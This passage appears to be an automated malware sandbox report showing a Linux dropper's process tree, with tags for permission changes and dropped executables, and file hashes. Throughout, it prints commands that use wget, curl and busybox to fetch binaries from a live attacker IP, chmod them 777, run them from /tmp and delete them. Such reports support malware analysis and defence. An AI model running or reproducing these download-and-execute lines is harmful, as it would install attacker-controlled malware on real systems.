/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:1650
-
-
/bin/chmodchmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- File and Directory Permissions Modification
PID:1651
-
-
/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Executes dropped EXE
PID:1652
-
-
/bin/rmrm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:1653
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:1654
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Writes file to tmp directory
PID:1655
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:1656
-
-
/bin/chmodchmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- File and Directory Permissions Modification
PID:1657
-
-
/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Executes dropped EXE
PID:1658
-
-
/bin/rmrm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:1659
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:1660
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Writes file to tmp directory
PID:1661
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:1662
-
-
/bin/chmodchmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- File and Directory Permissions Modification
PID:1663
-
-
/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Executes dropped EXE
PID:1664
-
-
/bin/rmrm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:1665
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:1666
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Writes file to tmp directory
PID:1667
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:1668
-
-
/bin/chmodchmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- File and Directory Permissions Modification
PID:1669
-
-
/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Executes dropped EXE
PID:1670
-
-
/bin/rmrm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:1671
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:1672
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Writes file to tmp directory
PID:1673
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:1674
-
-
/bin/chmodchmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- File and Directory Permissions Modification
PID:1675
-
-
/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Executes dropped EXE
PID:1676
-
-
/bin/rmrm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:1677
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:1678
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Writes file to tmp directory
PID:1679
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:1680
-
-
/bin/chmodchmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- File and Directory Permissions Modification
PID:1681
-
-
/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Executes dropped EXE
PID:1682
-
-
/bin/rmrm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:1683
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97